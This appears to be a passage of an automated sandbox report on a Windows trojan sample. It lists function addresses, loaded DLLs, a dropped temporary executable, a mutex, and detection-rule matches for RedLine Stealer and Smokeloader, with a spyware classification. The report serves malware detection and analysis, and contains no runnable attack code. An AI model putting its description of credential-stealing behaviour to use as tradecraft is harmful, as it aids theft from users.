        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_00642605 NtdllDefWindowProc_W,PostQuitMessage,0_2_00642605
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_004071AB0_2_004071AB
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_004373D90_2_004373D9
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0042D4EE0_2_0042D4EE
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_004274840_2_00427484
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_004285600_2_00428560
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0043D6780_2_0043D678
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_004166AF0_2_004166AF
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_004137250_2_00413725
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0040E9740_2_0040E974
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0042EAE00_2_0042EAE0
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_00418AAF0_2_00418AAF
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_00436CBF0_2_00436CBF
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_00413F0B0_2_00413F0B
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_006541720_2_00654172
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0066ED470_2_0066ED47
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_006676EB0_2_006676EB
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0066D7550_2_0066D755
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_006687C70_2_006687C7
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_006569160_2_00656916
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0065398C0_2_0065398C
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0064EBDB0_2_0064EBDB
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_0066ED470_2_0066ED47
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_00658D160_2_00658D16
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_00676F260_2_00676F26
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0043D0D03_2_0043D0D0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00408A603_2_00408A60
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004223703_2_00422370
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00421B303_2_00421B30
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00418BA23_2_00418BA2
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004378503_2_00437850
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0041906A3_2_0041906A
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004260103_2_00426010
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004438E03_2_004438E0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004180F03_2_004180F0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004438F93_2_004438F9
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004438FB3_2_004438FB
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004278853_2_00427885
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0041D8B03_2_0041D8B0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004069503_2_00406950
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004449503_2_00444950
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0040E16E3_2_0040E16E
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0040D1723_2_0040D172
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0043210B3_2_0043210B
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004039103_2_00403910
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004299173_2_00429917
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004061203_2_00406120
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0040B92C3_2_0040B92C
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0042F1C13_2_0042F1C1
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004239EB3_2_004239EB
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004211803_2_00421180
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0041618C3_2_0041618C
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0043099F3_2_0043099F
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0041F9A03_2_0041F9A0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0041D1B03_2_0041D1B0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0042E9B03_2_0042E9B0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0041BA523_2_0041BA52
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0043025E3_2_0043025E
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0042621B3_2_0042621B
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0042BA203_2_0042BA20
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004172223_2_00417222
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00443A303_2_00443A30
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004042C03_2_004042C0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00443AC03_2_00443AC0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004302CD3_2_004302CD
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0040F2D03_2_0040F2D0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004442E03_2_004442E0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0040B2803_2_0040B280
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004352B03_2_004352B0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00402B403_2_00402B40
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00443B603_2_00443B60
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00409B703_2_00409B70
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00429B7B3_2_00429B7B
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0042FB7D3_2_0042FB7D
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00405B003_2_00405B00
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00440B003_2_00440B00
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00428B103_2_00428B10
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00419B303_2_00419B30
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00411BDE3_2_00411BDE
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004123EC3_2_004123EC
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00428C623_2_00428C62
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0043C4603_2_0043C460
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0043B4103_2_0043B410
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00441C263_2_00441C26
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00444C203_2_00444C20
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004064C03_2_004064C0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0042F4E13_2_0042F4E1
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004324EE3_2_004324EE
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0041D4A03_2_0041D4A0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00408D103_2_00408D10
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0043E5203_2_0043E520
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00442DCA3_2_00442DCA
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00415DD83_2_00415DD8
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00425DA03_2_00425DA0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004085B03_2_004085B0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004096603_2_00409660
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00404E203_2_00404E20
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0043C6C03_2_0043C6C0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0043E6E03_2_0043E6E0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004186E53_2_004186E5
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004446803_2_00444680
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0041DE903_2_0041DE90
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0043CE903_2_0043CE90
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004287503_2_00428750
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0043DF603_2_0043DF60
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00429F7C3_2_00429F7C
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004337073_2_00433707
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00402F103_2_00402F10
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004257133_2_00425713
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0042F7163_2_0042F716
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004077303_2_00407730
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00427FC03_2_00427FC0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004437D03_2_004437D0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00433FDF3_2_00433FDF
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_004127E03_2_004127E0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0042A7F03_2_0042A7F0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00434FF03_2_00434FF0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0042AF923_2_0042AF92
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020E42463_2_020E4246
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020E52573_2_020E5257
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020ED3373_2_020ED337
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020C83573_2_020C8357
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020E23723_2_020E2372
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020B63873_2_020B6387
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020BD3D93_2_020BD3D9
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020BE3D53_2_020BE3D5
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020D13E73_2_020D13E7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020C603F3_2_020C603F
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020B50873_2_020B5087
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020ED0F73_2_020ED0F7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020CE0F73_2_020CE0F7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020EE1C73_2_020EE1C7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020C26533_2_020C2653
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020EB6773_2_020EB677
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020EC6C73_2_020EC6C7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020CD7073_2_020CD707
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020B67273_2_020B6727
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020DF7483_2_020DF748
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020E27553_2_020E2755
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020EE7873_2_020EE787
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020CD4173_2_020CD417
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020DF4283_2_020DF428
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020E04C53_2_020E04C5
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020BB4E73_2_020BB4E7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020E55173_2_020E5517
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020B45273_2_020B4527
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020E05343_2_020E0534
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020BF5373_2_020BF537
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020F45473_2_020F4547
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020D25D73_2_020D25D7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020C2A473_2_020C2A47
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020DAA573_2_020DAA57
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020E7AB73_2_020E7AB7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020D7B023_2_020D7B02
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020CDB173_2_020CDB17
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020B3B773_2_020B3B77
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020F4BB73_2_020F4BB7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020B6BB73_2_020B6BB7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020B88173_2_020B8817
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020B98C73_2_020B98C7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020F48E73_2_020F48E7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020EC9273_2_020EC927
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020C79503_2_020C7950
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020E396E3_2_020E396E
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020DF97D3_2_020DF97D
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020B79973_2_020B7997
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020D89B73_2_020D89B7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020C1E453_2_020C1E45
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020F1E8C3_2_020F1E8C
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020F4E873_2_020F4E87
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020B8F773_2_020B8F77
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020E0C063_2_020E0C06
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020CFC073_2_020CFC07
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020DEC173_2_020DEC17
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020D3C523_2_020D3C52
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020DAC893_2_020DAC89
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020DBC873_2_020DBC87
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020CBCB93_2_020CBCB9
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020B8CC73_2_020B8CC7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020F0D673_2_020F0D67
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020B5D673_2_020B5D67
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020D1D973_2_020D1D97
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020B2DA73_2_020B2DA7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020B9DD73_2_020B9DD7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020DFDE43_2_020DFDE4
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_020C7DFA3_2_020C7DFA
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: String function: 00410720 appears 53 times
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: String function: 00650987 appears 53 times
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: String function: 0040F903 appears 36 times
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: String function: 0040FDB2 appears 125 times
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: String function: 00650019 appears 121 times
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: String function: 00408280 appears 47 times
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: String function: 020C4E87 appears 145 times
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: String function: 00414C20 appears 145 times
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: String function: 020B84E7 appears 71 times
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3544 -s 1832
        Source: IH5XqCdf06.exeBinary or memory string: OriginalFileName vs IH5XqCdf06.exe
        Source: IH5XqCdf06.exe, 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs IH5XqCdf06.exe
        Source: IH5XqCdf06.exe, 00000000.00000003.2130385070.0000000002160000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs IH5XqCdf06.exe
        Source: IH5XqCdf06.exe, 00000000.00000003.2159839045.00000000033E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesOriginal4 vs IH5XqCdf06.exe
        Source: IH5XqCdf06.exe, 00000000.00000000.2121998119.000000000045A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesOriginal4 vs IH5XqCdf06.exe
        Source: IH5XqCdf06.exe, 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs IH5XqCdf06.exe
        Source: IH5XqCdf06.exeBinary or memory string: OriginalFilenamesOriginal4 vs IH5XqCdf06.exe
        Source: IH5XqCdf06.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 00000003.00000002.2291465028.0000000002080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000000.00000002.4569778024.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: IH5XqCdf06.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: 5734.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/7@2/3
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_006007A6 CreateToolhelp32Snapshot,Module32First,0_2_006007A6
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_0043D0D0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_0043D0D0
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\track_prt[1].htmJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeMutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3544
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeFile created: C:\Users\user\AppData\Local\Temp\5734.tmpJump to behavior
        Source: IH5XqCdf06.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: 5734.tmp.exe, 00000003.00000003.2198272243.0000000002E59000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2209509139.0000000002F09000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2198027156.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2209422292.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: IH5XqCdf06.exeVirustotal: Detection: 42%
        Source: IH5XqCdf06.exeReversingLabs: Detection: 52%
        Source: unknownProcess created: C:\Users\user\Desktop\IH5XqCdf06.exe "C:\Users\user\Desktop\IH5XqCdf06.exe"
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeProcess created: C:\Users\user\AppData\Local\Temp\5734.tmp.exe "C:\Users\user\AppData\Local\Temp\5734.tmp.exe"
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3544 -s 1832
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeProcess created: C:\Users\user\AppData\Local\Temp\5734.tmp.exe "C:\Users\user\AppData\Local\Temp\5734.tmp.exe" Jump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: msvcr100.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeSection loaded: winnsi.dllJump to behavior
